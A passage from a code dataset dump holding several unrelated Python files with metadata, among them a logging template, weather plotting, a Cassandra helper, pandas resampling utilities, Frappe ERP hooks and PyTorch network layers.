main()\r\n","sub_path":"sda2openlyrics_extractor2.py","file_name":"sda2openlyrics_extractor2.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"559629710","text":"import time\n\n\ndef ASTAR(array, start, goal, heuristic, diagnoal_allowed=False, peanlize_diagonals=False):\n start_time = time.time()\n # set this to the coordinates of the neighbors you want to check eg. (0, 1) to go one right, (0, -1) to go one right etc.\n # put code to handle checking only non-diagonal neighbors according to diagonal_allowed? 
parameter\n neighbors = []\n all_checked = [] #this is a list of coordinates to plot the entire search path.\n path = [] #this is the shortest path\n\n '''\n Enter your code here \n\n\n\n\n '''\n\n end_time = time.time()\n return False, all_checked, [], end_time - start_time\n","sub_path":"prog_assignment2/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"380433020","text":"#!/usr/bin/env python3\n\"\"\"Standard logging template in preferred format\"\"\"\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\n# Logging configuration\nlog = logging.getLogger(__name__)\nlog.setLevel(getattr(logging, \"INFO\"))\nlog_format = logging.Formatter(\"%(asctime)s [%(levelname)s] %(message)s\")\n# Log to file\n# Ensures logs are written to the project folder even if the script is\n# executed from another directory\nlog_path = \"/\".join(__file__.split(\"/\")[:-1])\nlog_file = RotatingFileHandler(\n filename=\"{}/application.log\".format(log_path if log_path else '.'),\n maxBytes=10 * 1024 * 1024, # Bytes to Megabytes\n backupCount=5\n )\nlog_file.setFormatter(log_format)\nlog.addHandler(log_file)\n# Log to console\nlog_stream = logging.StreamHandler()\nlog_stream.setFormatter(log_format)\nlog.addHandler(log_stream)\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"236687620","text":"import csv\nfrom datetime import datetime\n\nDeath_open = open(\"death_valley_2018_simple.csv\", \"r\")\nSitka_open = open(\"sitka_weather_2018_simple.csv\", \"r\")\n\nDeath_file = csv.reader(Death_open, delimiter=\",\")\nSitke_file = csv.reader(Sitka_open, delimiter=\",\")\n\nheader_row = next(Death_file)\nheader_row = next(Sitke_file)\n\n\nfor index, column_header in enumerate(header_row):\n print(\"Index:\", index, \"Column Name:\", column_header)\n\n\ndeath_highs = []\ndeath_lows = []\ndeath_dates = []\n\nSitka_highs = []\nSitka_lows = []\nSitka_dates = []\n\n# converted_date = datetime.strptime(\"2018-07-01\", \"%y-%m-%d\")\n\nfor row in Death_file:\n try:\n dhigh = int(row[4])\n dlow = int(row[5])\n ddate = datetime.strptime(row[2], \"%Y-%m-%d\")\n except ValueError:\n print(f\"missing data for {ddate}\")\n else:\n death_highs.append(dhigh)\n death_lows.append(dlow)\n death_dates.append(ddate)\n\n\nfor row in Sitke_file:\n try:\n Shigh = int(row[5])\n Slow = int(row[6])\n Sdate = datetime.strptime(row[2], \"%Y-%m-%d\")\n except ValueError:\n print(f\"missing data for {Sdate}\")\n else:\n Sitka_highs.append(Shigh)\n Sitka_lows.append(Slow)\n Sitka_dates.append(Sdate)\n\n\nimport matplotlib.pyplot as plt\n\nfig, a = plt.subplots(2)\na[0].plot(Sitka_dates, Sitka_highs, c=\"red\")\na[0].plot(Sitka_dates, Sitka_lows, c=\"blue\")\na[1].plot(death_dates, death_highs, c=\"red\")\na[1].plot(death_dates, death_lows, c=\"blue\")\n\n\na[0].set_title(\n \"Temperature comparison between SITKA AIRPORT, AK US and DEATH VALLEY, CA US \\n SITKA AIRPORT, AK US \",\n fontsize=16,\n)\n\na[1].set_title(\n \"DEATH VALLEY, CA US\",\n fontsize=16,\n)\n\na[0].fill_between(Sitka_dates, Sitka_highs, Sitka_lows, facecolor=\"blue\", alpha=0.1)\nplt.tick_params(axis=\"both\", labelsize=12)\n\na[1].fill_between(death_dates, death_highs, death_lows, facecolor=\"blue\", alpha=0.1)\nplt.tick_params(axis=\"both\", 
labelsize=12)\n\nfig.autofmt_xdate()\nplt.show()","sub_path":"DV_ST_Charts.py","file_name":"DV_ST_Charts.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"376046365","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass QianchengwuyouItem(scrapy.Item):\n list = ['工作岗位', '城市', '地区', 'more','薪资范围', '平均薪资', '招聘人数', '学历要求', '工作经验',\n '公司名称', '公司类型', '公司规模', '发布时间', '行业' , '公司福利', '职位链接', '职位信息']\n for li in list:\n exec(li + '=scrapy.Field()')\n\n","sub_path":"Spider_Match_Demo/QianChengWuYou/QianChengWuYou/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"376449219","text":"# -*- coding: utf-8 -*-\nimport urllib2\nimport re\n\ndef findMoive(values):\n url = 'https://www.douban.com/search?cat=1002&q='\n geturl = url+values\n request = urllib2.Request(geturl)\n response = urllib2.urlopen(request)\n content = response.read()\n pattern = re.compile(r' (.*?)')\n item = re.findall(pattern,content)\n if len(item) == 0 :\n return '没有找到这个电影'\n else:\n return '豆瓣评分:'+item[0]\n\n","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"80377548","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\nimport os\n\nfrom functools import reduce\n\ndef str2float(s):\n l = s.split('.')\n return reduce(lambda x, y : x * 10 + y, map(int, l[0])) + \\\n reduce(lambda x, y : x * 0.1 + y, map(int, l[1][::-1])) * 0.1\n\nprint(str2float('1324.123'))\n\nprint(\"%d, %s\", 3, 'test')\n","sub_path":"trash/python/tst-reduce_map_lambda.py","file_name":"tst-reduce_map_lambda.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"118930013","text":"import logging\n\nlog = logging.getLogger()\nlog.setLevel('INFO')\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"))\nlog.addHandler(handler)\nfrom cassandra.cluster import Cluster\nfrom cassandra.query import SimpleStatement\nfrom cassandra.policies import RoundRobinPolicy\n\nKEYSPACE = \"mnist\"\n\n\ndef createKeySpace():\n cluster = Cluster(contact_points=['cassandra'], load_balancing_policy=RoundRobinPolicy(),port=9042,)\n session = cluster.connect()\n\n log.info(\"Creating keyspace...\")\n try:\n session.execute(\"\"\"\n CREATE KEYSPACE %s\n WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '1' }\n \"\"\" % KEYSPACE)\n\n log.info(\"Setting keyspace...\")\n session.set_keyspace(KEYSPACE)\n\n log.info(\"Creating table...\")\n session.execute(\"\"\"\n CREATE TABLE History (\n IP_Address text,\n access_time timestamp,\n image_path text,\n mnist_result text,\n PRIMARY KEY (IP_Address, access_time)\n )\n \"\"\")\n \n \n except Exception as e:\n log.error(\"Unable to create keyspace\")\n log.error(e)\n\ndef insertData(ip_addr, access_time, image_path, mnist_result):\n cluster = Cluster(contact_points=['cassandra'],load_balancing_policy=None, port=9042,)\n session = cluster.connect()\n log.info(\"Inserting data...\")\n try:\n session.execute(\"\"\" \n INSERT INTO mnist.History (IP_Address, 
access_time, image_path, mnist_result)\n VALUES(%s, %s, %s, %s);\n \"\"\",\n (ip_addr, access_time, image_path, mnist_result)\n )\n except Exception as e:\n log.error(\"Unable to insert data\")\n log.error(e)","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"28024078","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport collections\n\nimport pandas as pd\nimport numpy as np\n\n'''\nThese functions seem useful for use outside the break detection.\nTherefore they are made independent from any classes\n'''\n\ndef conditional_temp_resample(ds, how='M', threshold=0.1):\n '''\n Resample a dataframe to the given temporal resolution ('M', 'D', etc.).\n If the number of valid values (not nans) in a resample period (eg. 'M')\n is smaller than the defined threshold, the resample will be NaN Parameters.\n ----------\n ds : pandas.Series\n DataFrame to resample\n how : str\n Time frame for temporal resampling, M = monthly, SMS= semi-month start, SM = semi-month end\n MM=month middle\n threshold : float\n % of valid observations (not nan) in period defined in 'how'\n Returns\n -------\n df_resampled : pd.Series\n The resampled Series\n\n df_count : pd.DataFrame\n Number of observations per period and threshold that had to be reached\n '''\n\n name = ds.name\n df = ds.copy(True).to_frame(name='input')\n\n if all(df['input'].isnull()): # if there are only Nons in the ds\n df['input'].fillna(np.nan, inplace=True)\n threshold = None\n\n if how == 'MM':\n month_middle = True\n how = 'MS'\n else:\n month_middle = False\n\n if not threshold:\n df_resampled = df.resample(how).mean()\n df_count = None\n else:\n if 'M' not in how: # works only for resampling to monthly values\n raise NotImplementedError\n\n years, months = df.index.year, df.index.month\n\n if len(years) == 0 or len(months) == 0:\n return None\n\n startday = datetime(years[0], months[0], 1)\n last_year, last_month = years[-1], months[-1]\n\n if last_month == 12:\n next_month, next_year = 1, last_year + 1\n else:\n next_month, next_year = last_month + 1, last_year\n\n days_last_month = (datetime(next_year, next_month, 1) - datetime(last_year, last_month, 1)).days\n endday = datetime(last_year, last_month, days_last_month)\n\n index_full = pd.DatetimeIndex(start=startday, end=endday, freq='D')\n df_alldays = pd.DataFrame(index=index_full,\n data={'count_should': 1}).resample(how).sum()\n\n\n df_mean = df.resample(how).mean()\n\n df['count'] = 1\n df_mean['count_is'] = df[['count']].resample(how).sum()\n df_mean['count_should'] = df_alldays['count_should'] * threshold\n\n df_filtered = df_mean.loc[df_mean['count_is'] >= df_mean['count_should']]\n\n df_count = df_filtered[['count_should', 'count_is']]\n df_resampled = df_filtered.drop(['count_should', 'count_is'], axis=1)\n\n if month_middle:\n df_resampled = df_resampled.resample(how, loffset=pd.Timedelta(14, 'd')).mean().dropna()\n\n return df_resampled['input'], df_count\n\n\ndef df_conditional_temp_resample(df_in, resample_to, resample_threshold):\n \"\"\"\n Wrapper around resample function to resample the input dataframe\n to the selected period, with the selected threshold for minimum\n temporal coverage in % per observation.\n\n Parameters\n -------\n ds_in : pandas.DataFrame\n DataFrame that should be resampled\n resample_to : 'str'\n Time period to resample to, eg M or D\n resample_threshold : float\n Minimum % of observations in the 
selected period to calculate a mean\n e.g. 0.1 = 10% valid observations, 1 = 100% valid observations\n\n Returns\n -------\n df_test_resampled : pd.DataFrame\n The resampled DataFrame\n \"\"\"\n\n if df_in.empty:\n return df_in\n\n df = df_in.copy(True) #type: pd.DataFrame\n\n resampled_series = []\n for col in df.columns:\n resampled, _ = conditional_temp_resample(df[col], resample_to, resample_threshold)\n resampled.name = col\n resampled_series.append(resampled)\n\n\n df_resampled = pd.concat(resampled_series, axis=1)\n\n if not df_resampled.columns.size == df.columns.size:\n return df_in\n\n return df_resampled\n\n\ndef filter_by_quantiles(df_in, filter_col, lower=.1, upper=.9):\n '''\n Filters a data frame by dropping the >upper % and % f' % (filter_col, upper_threshold, filter_col, lower_threshold)).index\n # index_masked = df[(df[colname] < upper_threshold) & (df[colname] > lower_threshold)].index\n df_in.loc[index_masked, 'diff_flag'] = 0\n\n masked_values = df_in['diff_flag']\n return masked_values\n\n\ndef crosscorr(can, ref, lag=0, method='spearman'):\n \"\"\"\n Calculate the cross correlation between 2 pandas Series with the passed lag(s)\n\n Parameters\n ----------\n can : pd.Series\n Candidate data set (that is shifted)\n ref : pd.Series\n Reference data set (that is stationary)\n lag : int or list\n Lag(s) for which the correlations are calculated (can is shifted)\n method : str\n Correlation type, as in pd.corr ('pearson', 'spearman', etc.)\n\n Returns\n ----------\n ccorr : float or list\n Cross correlations between can and ref for the selected time lag(s)\n \"\"\"\n\n if not isinstance(lag, collections.Iterable):\n return ref.corr(can.shift(lag), method=method)\n else:\n return [ref.corr(can.shift(lag), method=method) for lag in lag]\n\n\ndef autocorr(can, lag=0, method='spearman'):\n \"\"\"\n Calculate the auto correlation for a pandas Series with the passed lag(s)\n\n Parameters\n ----------\n can : pd.Series\n Candidate data set (that is shifted)\n lag : int or list\n Lag(s) for which the correlations are calculated\n method : str\n Correlation type, as in pd.corr ('pearson', 'spearman', etc.)\n\n Returns\n ----------\n acorr : float or list\n Auto correlations between can and ref for the selected time lag(s)\n \"\"\"\n\n if not isinstance(lag, collections.Iterable):\n return can.corr(can.shift(lag), method=method)\n else:\n return [can.corr(can.shift(lag), method=method) for lag in lag]\n\ndef flatten_dict(d):\n '''\n Flattens a dict of dicts so that the keys of 2 levels are merged into 1 key which contains the data of the\n sublevel dictionary.\n\n Parameters\n ----------\n d : dict\n Dict of dicts that will be flattened.\n\n\n Returns\n -------\n flat : dict\n Flattened dictionary\n\n '''\n def expand(key, value):\n if isinstance(value, dict):\n return [ (key + '_' + k, v) for k, v in flatten_dict(value).items() ]\n else:\n return [ (key, value) ]\n\n items = [ item for k, v in d.items() for item in expand(k, v) ]\n\n return dict(items)\n\n\n\n\nif __name__ == '__main__':\n # test crosscorr\n x = pd.Series(index=pd.DatetimeIndex(start='2000-01-01', end='2000-12-31', freq='D'), data=np.random.rand(366))\n y = pd.Series(index=pd.DatetimeIndex(start='2000-01-01', end='2000-12-31', freq='D'), data=np.random.rand(366))\n\n lags = range(100)\n cc_fct = pd.Series(index=lags, 
data=crosscorr(x,y,lags))\n","sub_path":"breakadjustment/break_standalone_functions.py","file_name":"break_standalone_functions.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"534864737","text":"def string_reverser(our_string):\n new_string = \"\"\n\n for index in range(len(our_string)):\n new_string = new_string + our_string[(len(our_string) -1) - index]\n\n return new_string\n\ndef anagram_checker(str1, str2):\n str1 = str1.replace(\" \", \"\").lower()\n str2 = str2.replace(\" \", \"\").lower()\n\n if len(str1) == len(str2):\n if sorted(str1) == sorted(str2):\n return True\n\n return False\n\ndef word_flipper(our_string):\n word_list = our_string.split(\" \")\n\n for index in range(len(word_list)):\n word_list[index] = word_list[index][::-1]\n\n return \" \".join(word_list)\n\ndef hamming_distance(str1, str2):\n if len(str1) == len(str2):\n count = 0\n\n for char in range(len(str1)):\n if str1[char] != str2[char]:\n count += 1\n\n return count\n\n return None","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"412217401","text":"'''\nFuck RNN\n'''\n\nstr_src = list()\nstr_dist = list()\n\nwith open('test_ans.txt') as f:\n for line in f.readlines():\n line = line.strip() \n str_src.append(str(line))\n\nwith open('test_res.txt') as f:\n for line in f.readlines():\n line = line.strip() \n str_dist.append(str(line))\n\nlist_src = list()\nlist_dist = list()\n\nfor word in str_src:\n list_src.append(word.split(' '))\n\nfor word in str_dist:\n list_dist.append(word.split(' '))\n\nlist_src_pair = list()\nlist_dist_pair = list()\n\nall_real_pair = 0\nall_pred_pair = 0\nall_err_pair = 0 # -1 in predict data\nlist_real_pair = list()\nlist_pred_pair = list()\nlist_err_pair = list()\n\nfor i, sentence in enumerate(list_src):\n stack = []\n tmp_src_pair = [0 for i in range(len(sentence))]\n sent_pair = 0\n for j, char in enumerate(sentence):\n if char == '(':\n stack.append(['(', j])\n elif char == ')':\n stack_pop = stack.pop()\n tmp_src_pair[j] = stack_pop[1] + 1\n tmp_src_pair[stack_pop[1]] = j + 1\n # pair\n all_real_pair = all_real_pair + 1\n sent_pair = sent_pair + 1\n\n if len(stack) != 0:\n for i in range(len(stack)):\n stack_pop = stack.pop()\n tmp_src_pair[j] = -1\n list_src_pair.append(tmp_src_pair)\n list_real_pair.append(sent_pair)\n\n\nfor i, sentence in enumerate(list_dist):\n stack = []\n tmp_dist_pair = [0 for i in range(len(sentence))]\n sent_pair = 0\n err_pair = 0\n for j, char in enumerate(sentence):\n if char == '(':\n stack.append(['(', j])\n elif char == ')':\n if len(stack) != 0:\n stack_pop = stack.pop()\n tmp_dist_pair[j] = stack_pop[1] + 1\n tmp_dist_pair[stack_pop[1]] = j + 1\n # pair\n all_pred_pair = all_pred_pair + 1\n sent_pair = sent_pair + 1\n else:\n stack.append([')', j])\n if len(stack) != 0:\n for i in range(len(stack)):\n stack_pop = stack.pop()\n tmp_dist_pair[j] = -1\n all_err_pair = all_err_pair + 1\n err_pair = err_pair + 1\n list_dist_pair.append(tmp_dist_pair)\n list_pred_pair.append(sent_pair)\n list_err_pair.append(err_pair)\n\nprint('[OK] Stack processing...')\nprint(' ')\n\nall_TP = 0\nall_FN = 0\nall_FP = 0 \n\navg_sen = 0 # sen = tp/(tp+fn)\navg_spec = 0 # spec = tp/(tp+fp)\n\ncmp_len = len(list_dist_pair)\n\nwith open('compare_log.txt', 'w') as f:\n for i in range(cmp_len):\n print('compare epoch ' + 
str(i))\n f.write('compare epoch ' + str(i) + '\\n')\n print('=====================')\n f.write('=====================' + '\\n')\n\n line_TP = 0\n line_FN = 0\n line_FP = 0\n line_sen = 0\n line_spec = 0\n\n line_flag = [0 for j in range(min(len(list_src_pair[i]), len(list_dist_pair[i])))]\n for j in range(min(len(list_src_pair[i]), len(list_dist_pair[i]))):\n # TP\n if (list_src_pair[i][j] == list_dist_pair[i][j] and line_flag[j] == 0 and line_flag[list_src_pair[i][j]-1] == 0):\n all_TP = all_TP + 1\n line_TP = line_TP + 1\n line_flag[j] = 1\n line_flag[list_src_pair[i][j]-1] = 1\n # FN\n elif (list_src_pair[i][j] > 0 and list_dist_pair[i][j] == 0):\n all_FN = all_FN + 1\n line_FN = line_FN + 1\n # FP\n elif (list_src_pair[i][j] == 0 and list_dist_pair[i][j] > 0):\n all_FP = all_FP + 1\n line_FP = line_FP + 1\n\n line_sen = line_TP / (line_TP + line_FN)\n line_spec = line_TP / (line_TP + line_FP)\n\n avg_sen = avg_sen + line_sen\n avg_spec = avg_spec + line_spec\n\n print('line actual pairs: ' + str(list_real_pair[i]))\n f.write('line actual pairs: ' + str(list_real_pair[i]))\n f.write('\\n')\n\n print('line predict pairs: ' + str(list_pred_pair[i]))\n f.write('line predict pairs: ' + str(list_pred_pair[i]))\n f.write('\\n')\n\n print('line error pairs: ' + str(list_err_pair[i]))\n f.write('line error pairs: ' + str(list_err_pair[i]))\n f.write('\\n')\n\n print('line true positive: ' + str(line_TP))\n f.write('line true positive: ' + str(line_TP))\n f.write('\\n')\n\n print('line false negative: ' + str(line_FN))\n f.write('line false negative: ' + str(line_FN))\n f.write('\\n')\n\n print('line false positive: ' + str(line_FP))\n f.write('line false positive: ' + str(line_FP))\n f.write('\\n')\n\n print('line sensitivity: ' + str(line_sen))\n f.write('line sensitivity: ' + str(line_sen))\n f.write('\\n')\n\n print('line specificity: ' + str(line_spec))\n f.write('line specificity: ' + str(line_spec))\n f.write('\\n')\n\n print(' ')\n f.write('\\n')\n\n all_sen = all_TP / (all_TP + all_FN)\n all_spec = all_TP / (all_TP + all_FP)\n avg_sen = avg_sen / cmp_len\n avg_spec = avg_spec / cmp_len\n\n print('compare result')\n f.write('compare result')\n f.write('\\n')\n\n print('=====================')\n f.write('=====================')\n f.write('\\n')\n \n print('all actual pairs: ' + str(all_real_pair))\n f.write('all actual pairs: ' + str(all_real_pair))\n f.write('\\n')\n\n print('all predict pairs: ' + str(all_pred_pair))\n f.write('all predict pairs: ' + str(all_pred_pair))\n f.write('\\n')\n\n print('all error pairs: ' + str(all_err_pair))\n f.write('all error pairs: ' + str(all_err_pair))\n f.write('\\n')\n\n print('all true positive: ' + str(all_TP))\n f.write('all true positive: ' + str(all_TP))\n f.write('\\n')\n\n print('all false negative: ' + str(all_FN))\n f.write('all false negative: ' + str(all_FN))\n f.write('\\n')\n\n print('all false positive: ' + str(all_FP))\n f.write('all false positive: ' + str(all_FP))\n f.write('\\n')\n\n print('all sensitivity: ' + str(all_sen))\n f.write('all sensitivity: ' + str(all_sen))\n f.write('\\n')\n\n print('all specificity: ' + str(all_spec))\n f.write('all specificity: ' + str(all_spec))\n f.write('\\n')\n\n print('average sensitivity: ' + str(avg_sen))\n f.write('average sensitivity: ' + str(avg_sen))\n f.write('\\n')\n\n print('average specificity: ' + str(avg_sen))\n f.write('average specificity: ' + str(avg_sen))","sub_path":"Milestone/Milestone 
III/150xSeqNP_OK/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":6471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"43423249","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport default_flavor\n\n\"\"\"GN Android flavor utils, used for building Skia for Android with GN.\"\"\"\nclass GNAndroidFlavorUtils(default_flavor.DefaultFlavorUtils):\n def supported(self):\n return 'GN_Android' == self.m.vars.builder_cfg.get('extra_config', '')\n\n def _run(self, title, cmd):\n path = self.m.vars.default_env['PATH']\n self.m.vars.default_env = {'PATH': path}\n self.m.run(self.m.step, title, cmd=cmd, cwd=self.m.vars.skia_dir, env={})\n\n def compile(self, unused_target, **kwargs):\n compiler = self.m.vars.builder_cfg.get('compiler')\n configuration = self.m.vars.builder_cfg.get('configuration')\n os = self.m.vars.builder_cfg.get('os')\n target_arch = self.m.vars.builder_cfg.get('target_arch')\n\n assert compiler == 'Clang' # At this rate we might not ever support GCC.\n\n ndk_asset = 'android_ndk_linux' if os == 'Ubuntu' else 'android_ndk_darwin'\n\n quote = lambda x: '\"%s\"' % x\n gn_args = ' '.join('%s=%s' % (k,v) for (k,v) in sorted({\n 'is_debug': 'true' if configuration == 'Debug' else 'false',\n 'ndk': quote(self.m.vars.slave_dir.join(ndk_asset)),\n 'target_cpu': quote(target_arch),\n }.iteritems()))\n\n self._run('fetch-gn', [self.m.vars.skia_dir.join('bin', 'fetch-gn')])\n self._run('gn gen', ['gn', 'gen', self.out_dir, '--args=' + gn_args])\n self._run('ninja', ['ninja', '-C', self.out_dir])\n","sub_path":"infra/bots/recipe_modules/flavor/gn_android_flavor.py","file_name":"gn_android_flavor.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"486490551","text":"\"\"\"Common functions for dealing with the database.\"\"\"\n\nimport sqlite3\n\nRAW_TABLE = \"raw\"\nRAW_ID = \"raw_id\"\n\n\ndef connect(path: str) -> sqlite3.Connection:\n \"\"\"Connect to an SQLite database.\"\"\"\n cxn = sqlite3.connect(path)\n\n cxn.execute(\"PRAGMA page_size = {}\".format(2 ** 16))\n cxn.execute(\"PRAGMA busy_timeout = 10000\")\n cxn.execute(\"PRAGMA journal_mode = WAL\")\n cxn.row_factory = sqlite3.Row\n return cxn\n\n\ndef select_raw(\n cxn: sqlite3.Connection, limit: int = 0, offset: int = 0\n) -> sqlite3.Cursor:\n \"\"\"Get raw records.\"\"\"\n clause = f\"LIMIT {limit}\" if limit else \"\"\n clause += f\" OFFSET {offset}\" if offset else \"\"\n return cxn.execute(f\"SELECT * FROM {RAW_TABLE} {clause};\")\n","sub_path":"vertnet/pylib/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"352792420","text":"import frappe\nfrom frappe import _, msgprint, db, get_list, delete_doc, get_doc\nfrom frappe.utils import get_url_to_form\n\n\n@frappe.whitelist()\ndef payment_on_submit(self, method):\n\tpo_payments(self, method)\n\n@frappe.whitelist()\ndef pi_on_submit(self, method):\n\tcreate_part_tool(self, method)\n\n@frappe.whitelist()\ndef pi_on_cancel(self, method):\n\tcancel_part_tool(self, method)\n\t\ndef create_part_tool(self, method):\n\tparts = []\n\tfor row in self.items:\n\t\tif row.item_group == \"Truck Part\":\n\t\t\tpart_tool = frappe.new_doc(\"Part Creation 
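Editor's sketch, standalone and hypothetical: the db.py record above layers SQLite pragmas and a LIMIT/OFFSET clause over sqlite3; the same paging pattern can be reproduced against a toy in-memory "raw" table like this.

import sqlite3

cxn = sqlite3.connect(":memory:")
cxn.execute("PRAGMA journal_mode = WAL")  # no effect for :memory:, shown for parity
cxn.row_factory = sqlite3.Row
cxn.execute("CREATE TABLE raw (raw_id INTEGER PRIMARY KEY, val TEXT)")
cxn.executemany("INSERT INTO raw (val) VALUES (?)", [("a",), ("b",), ("c",)])

# Build the clause the way select_raw() does, then page through results.
limit, offset = 2, 1
clause = f"LIMIT {limit}" if limit else ""
clause += f" OFFSET {offset}" if offset else ""
for row in cxn.execute(f"SELECT * FROM raw {clause};"):
    print(dict(row))  # {'raw_id': 2, 'val': 'b'} then {'raw_id': 3, 'val': 'c'}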
Tool\")\n\t\t\tpart_tool.truck_part = row.item_code\n\t\t\tpart_tool.part_company = row.part_company\n\t\t\tpart_tool.number_of_parts = int(row.qty)\n\t\t\tpart_tool.warehouse = row.part_warehouse\n\t\t\tpart_tool.purchase_invoice = self.name\n\t\t\tpart_tool.supplier = self.supplier\n\t\t\tpart_tool.purchase_date = self.posting_date\n\t\t\tpart_tool.purchase_rate = row.rate\n\t\t\tpart_tool.save()\n\t\t\tdb.commit()\n\t\t\tlink = get_url_to_form(\"Part Creation Tool\", part_tool.name)\n\t\t\tparts.append(\"
{1}\".format(link.replace('localhost', 'localhost:8081'),row.item_code))\n\t\t\t\n\tif parts:\n\t\tmsgprint(_(\"Part Creation Tool updated for parts '%s'. Please submit the document to create parts.\"%(\",\".join(parts))))\n\n\ndef cancel_part_tool(self, method):\n\tresult = get_list(\"Part Creation Tool\", filters={'purchase_invoice': self.name}, fields='name')\n\t\t\t\t\n\tfor row in result:\n\t\tdelete_doc(\"Part Creation Tool\", row.name)\n\t\t\t\n#Update PO payments on Submit\ndef po_payments(self, method):\n\tfor row in self.references:\n\t\tif row.reference_doctype == \"Purchase Order\":\n\t\t\ttarget_po = get_doc(\"Purchase Order\", row.reference_name)\n\t\t\t\n\t\t\ttarget_po.append(\"payments\", {\n\t\t\t\t\"reference_date\": self.reference_date,\n\t\t\t\t\"mode_of_payment\": self.mode_of_payment,\n\t\t\t\t\"reference_no\": self.reference_no,\n\t\t\t\t\"paid_amount\" : row.allocated_amount,\n\t\t\t\t\"payment_entry\" : self.name,\n\t\t\t\t\"difference_amount\" : self.difference_amount\n\t\t\t})\n\t\ttarget_po.save()\n\t\tdb.commit()","sub_path":"transport/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"533548077","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport numpy as np\nfrom all.environments import State\n\nclass ListNetwork(nn.Module):\n '''\n Wraps a network such that States can be given as input.\n '''\n\n def __init__(self, model, out):\n super().__init__()\n self.model = model\n self.out = list(out)\n self.device = next(model.parameters()).device\n\n def forward(self, state):\n return self.model(state.features.float()) * state.mask.float().unsqueeze(-1)\n\nclass ListToList(nn.Module):\n '''\n Wraps a network such that States can be given as inputs, and are received as output.\n '''\n\n def __init__(self, model):\n super().__init__()\n self.model = model\n self.device = next(model.parameters()).device\n\n def forward(self, state):\n return State(self.model(state.features.float()), state.mask, state.info)\n\nclass Aggregation(nn.Module):\n '''len()\n Aggregation layer for the Dueling architecture.\n\n https://arxiv.org/abs/1511.06581\n This layer computes a Q function by combining\n an estimate of V with an estimate of the advantage.\n The advantage is normalized by substracting the average\n advantage so that we can propertly\n '''\n\n def forward(self, value, advantages):\n return value + advantages - torch.mean(advantages, dim=1, keepdim=True)\n\n\nclass Dueling(nn.Module):\n '''\n Implementation of the head for the Dueling architecture.\n\n https://arxiv.org/abs/1511.06581\n This module computes a Q function by computing\n an estimate of V, and estimate of the advantage,\n and combining them with a special Aggregation layer.\n '''\n\n def __init__(self, value_model, advantage_model):\n super(Dueling, self).__init__()\n self.value_model = value_model\n self.advantage_model = advantage_model\n self.aggregation = Aggregation()\n\n def forward(self, features):\n value = self.value_model(features)\n advantages = self.advantage_model(features)\n return self.aggregation(value, advantages)\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size()[0], -1)\n\n\nclass NoisyLinear(nn.Linear):\n '''\n Implementation of Linear layer for NoisyNets\n\n https://arxiv.org/abs/1706.10295\n NoisyNets are a replacement for epsilon greedy exploration.\n Gaussian noise is added to the weights of the output 
layer, resulting in\n a stochastic policy. Exploration is implicitly learned at a per-state\n and per-action level, resulting in smarter exploration.\n '''\n\n def __init__(self, in_features, out_features, sigma_init=0.017, bias=True):\n super(NoisyLinear, self).__init__(in_features, out_features, bias=bias)\n self.sigma_weight = nn.Parameter(torch.Tensor(\n out_features, in_features).fill_(sigma_init))\n self.register_buffer(\n \"epsilon_weight\", torch.zeros(out_features, in_features))\n if bias:\n self.sigma_bias = nn.Parameter(\n torch.Tensor(out_features).fill_(sigma_init))\n self.register_buffer(\"epsilon_bias\", torch.zeros(out_features))\n self.reset_parameters()\n\n def reset_parameters(self):\n std = np.sqrt(3 / self.in_features)\n nn.init.uniform_(self.weight, -std, std)\n nn.init.uniform_(self.bias, -std, std)\n\n def forward(self, x):\n bias = self.bias\n\n if not self.training:\n return F.linear(x, self.weight, bias)\n\n torch.randn(self.epsilon_weight.size(), 